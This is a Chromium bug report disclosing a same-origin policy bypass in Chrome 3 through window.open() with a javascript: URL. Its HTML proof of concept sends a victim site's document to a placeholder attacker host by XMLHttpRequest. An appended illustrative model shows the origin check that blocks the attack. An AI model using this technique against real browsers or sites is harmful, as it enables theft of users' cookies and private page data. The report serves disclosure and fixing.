Status: Unconfirmed
Owner: ----
Labels: Type-Bug Pri-2 OS-All Area-Misc
New issue 30660 by tokuji.akamine: window.open() Method Javascript Same-Origin Policy Violation
https://code.google.com/p/chromium/issues/detail?id=30660
Chrome Version: Google Chrome 3.0.195.38 (Official Build 34131)
WebKit 532.0
V8 1.2.14.20
User Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.38 Safari/532.0
URLs (if applicable): N/A
Other browsers tested:
Add OK or FAIL after other browsers where you have tested this issue:
Safari 4: OK
Firefox 3.x: OK
IE 7: OK
IE 8: OK
What steps will reproduce the problem?
1. Invite the victim to the malicious content (please see below PoC) hosted on the attacker's domain.
2. An iframe named "SOMENAME" in the malicious content loads data from a third party domain.
3. The malicious content executes the JavaScript code in the window.open method which targets "SOMENAME".
4. That JavaScript code in the window.open method is executed in the context of the third party domain and can grab the victim's cookie and other data from the third party domain and send these data to the attacker's domain.

Before sending these data, Chrome sends an "OPTIONS" method to confirm that the attacker's site allows the cross domain request from the third party site. If the attacker's site sends back the response which includes valid "Access-Control-Allow-XXX" headers, Chrome makes a request which contains the third party's content and cookie to the attacker's site.
What is the expected result?
Permission should be denied by the same-origin policy.
What happens instead?
The attacker can bypass the same-origin policy to steal the victim's cookie and other data from a third party domain via Chrome.
Please provide any additional information below. Attach a screenshot if possible.
### PoC
<html>
<head>
<title>window.open() Method Javascript Same-Origin Policy Violation</title>
<script>
// Wait 5 s so the cross-origin frame has finished loading before the test runs.
setTimeout("steal3rdPartyContent()", 5000);
function steal3rdPartyContent() {
  try {
    // A javascript: URL targeted at the named frame; it must not execute with the frame's origin.
    window.open("javascript:var x=new XMLHttpRequest();x.open('POST','http://[attacker's site]/');x.send(document);", "SOMENAME");
  } catch (e) { alert(e) }
}
</script>
</head>
<body>
<iframe name="SOMENAME" src="http://[victim's site]/"></iframe>
</body>
</html>
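The rule the report expects the browser to enforce, written out as an added example (this is a model for illustration, not code from the report or from Chromium): a javascript: URL aimed at a named frame may only run when the opener and the frame's current document share an origin, while an ordinary URL navigation of the frame stays allowed. The frame table, names and URLs are constructed.

```javascript
// Added example, not part of the bug report: a model of the check a browser
// must apply before honouring window.open("javascript:...", name).
// Frame names and URLs below are constructed for illustration.
const FRAMES = { SOMENAME: 'http://victim.example/' }; // name -> document URL

function originOf(url) {
  const o = new URL(url).origin; // scheme://host[:port], default port dropped
  return o === 'null' ? null : o; // opaque origins never match anything
}

function sameOrigin(a, b) {
  const oa = originOf(a), ob = originOf(b);
  return oa !== null && oa === ob;
}

// Decide what window.open(url, target) issued by a document at openerUrl may do.
function decideWindowOpen(openerUrl, url, target, frames = FRAMES) {
  const isJsUrl = /^\s*javascript:/i.test(url);
  const targetDoc = Object.prototype.hasOwnProperty.call(frames, target)
    ? frames[target] : null;
  if (!isJsUrl) {
    // Loading a new URL replaces the frame's document; nothing runs in the
    // old document's origin, so cross-origin navigation is permitted.
    return { allowed: true, reason: 'url-navigation' };
  }
  if (targetDoc === null) {
    // No frame of that name: a fresh window whose blank document inherits the
    // opener's origin, so the script runs as the opener itself.
    return { allowed: true, reason: 'new-window', executesAs: originOf(openerUrl) };
  }
  if (sameOrigin(openerUrl, targetDoc)) {
    return { allowed: true, reason: 'same-origin', executesAs: originOf(targetDoc) };
  }
  // The reported bug is this branch being reached and the script still running
  // with targetDoc's origin and cookies; it must be refused.
  return { allowed: false, reason: 'cross-origin javascript: navigation blocked' };
}
```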
Automated mail from issue updates at http://crbug.com/